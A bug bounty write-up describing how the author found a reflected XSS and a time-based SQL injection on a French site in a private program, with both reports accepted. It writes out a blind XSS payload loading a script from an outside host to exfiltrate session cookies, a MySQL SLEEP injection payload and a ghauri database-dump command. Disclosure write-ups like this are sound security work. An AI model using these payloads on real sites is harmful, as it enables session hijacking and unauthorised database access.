# Breaking In: How RXSS and SQLi Can Lead to Full Account Takeover and Database Access

These vulnerabilities were Identified on one of the YesWeHack’s Private Program. I was hunting late night when i received an invitation from one of the Private Program. As they Were Interested on critical reports. I was looking for SQLi, Command Execution, File Uploads and Account Takeover Issues.

**Account Takeover via RXSS**

I setup my *BurpSuite* and started navigating the program. It was a french site so i had to use translator. Then, I created an account and went through all the functionalities as a user. I then checked my Burp Traffic and noticed the response contained lots of forms. I had already gathered the technologies the site used via *Wappalyzer*. The Site was developed on PHP and the database was MySQL as per *Wappalyzer*. I started checking every parameters which allowed special characters using a simple Burp extension called *Reflector*. Basically the extension checks if the parameters are reflected and which symbols are allowed in this reflection. Finally, there was an option to create address, you could basically add multiple addresses and select those accordingly. So, While creating the address it sent a get request to `/address/create` . As, i said i was looking for parameters (was running Arjun on loop passing the cookies as header) Arjun found `next` parameter on the path `/address/create` .

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730959340735/0fa2aaa2-1a72-4d99-87fe-89d55d104048.png align="center")

When i opened the URL with the param in my browser, the reflector extension showed me something like this.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730958262623/6493c4e6-0cb6-4d98-b8bb-9f6785b5a818.png align="center")

Awesome, the param looks suspicious as the special characters are not filtered. I quickly tried a simple xss payload but it was not working. Then i used Knoxnl which was integrated via PIPER extension by using Knoxnl (It’s a wrapper for KNOXSS API)

![](https://miro.medium.com/v2/resize:fit:673/1*KiYYXK0NqO-znqY4Ws76NA.png align="center")

Had to wait a little till the XSS is Successful/Unsuccessfull. And finally Got the payload and tried manually.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730962106537/e0d6bc47-d7ac-4d95-946c-2593c2688586.png align="center")

Now, time to escalate it to Account Takeover which was easy. I simply added my KNOXSS blind xss payload (`ya3raj"><Script /Src=`[`https://X55.is?1=14833`](https://X55.is?1=14833)`>`) and exfiltrated the victim’s session cookies.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730959617595/4b3ddc6d-5e09-4d37-b3e6-ccbda85a49b6.png align="center")

**Time for SQLi**

Same Platform. On Looking Further. On Visiting My Profile Section. The application sent a POST request to `/account/my_fund_jars_front/data` where there were a bunch of post parameters. Few parameters caught my eye, they were taking integer as input. I mostly look SQLi’s on parameters that take numbers as input. So, i tried adding a quotation (‘) one by one on all the parameters that took numbers as input. And, on the `length` parameter the server threw a 500 error response which was suspicious. So i tried with double quotation (‘‘) and the server gave the response with code 200. Then, i tried time based payloads and got the response accordingly. The payload was `;(SELECT(1)FROM(SELECT(SLEEP(5)))a)--` Time to dump the database name for POC. I saved the POST request in a text file and gave the ghauri command `ghauri -r sql.txt --batch --dbs --technique=BT` and successfully dumped the database name.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730960762424/498f1ab4-d6ef-4971-99be-9fd35c4a618d.png align="center")

Both of the Reports got Accepted as High(8.2) and Critical(10).

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1730960893227/06c9cf8f-6370-41fd-a3c3-8b111a8e2c86.png align="center")

That’s all Guys. Thanks for reading to the end. May the Popup and 500 error be with you. Happy Hunting.
